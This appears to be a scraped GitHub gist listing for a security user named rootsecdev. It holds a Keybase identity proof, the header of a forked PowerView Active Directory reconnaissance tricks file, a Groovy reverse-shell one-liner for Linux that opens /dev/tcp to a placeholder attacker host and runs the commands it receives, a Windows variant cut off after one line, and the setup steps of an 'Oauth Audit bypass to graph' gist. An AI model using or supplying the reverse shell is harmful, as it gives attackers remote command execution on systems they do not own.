I hereby claim:
- I am rootsecdev on github.
- I am rootsecdev (https://keybase.io/rootsecdev) on keybase.
- I have a public key ASCE_MA80HmLqvX0Z9ZcUEVTlTX53djDBj5qDjsX2Nbc3Ao
To claim this, I am signing this object:
rootsecdev
rootsecdev
/ keybase.md
Created
March 23, 2019 04:58
rootsecdev
/ PowerView-3.0-tricks.ps1
Created
October 8, 2021 02:43
— forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
Groovy script for reverse shell (Linux):
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/your_attacker_ip/8443;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor()
Groovy script for reverse shell (Windows):
String host="your_attacker_ip";
rootsecdev
/ gist:994ff3dd7f18bbaff62abd1d979b1925
Last active
March 13, 2024 22:27
Oauth Audit bypass to graph
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Install AZ CLI: | |
| az login --allow-no-subscription | |
| Install MS Graph: | |
| Install-Module Microsoft.Graph -Scope AllUsers | |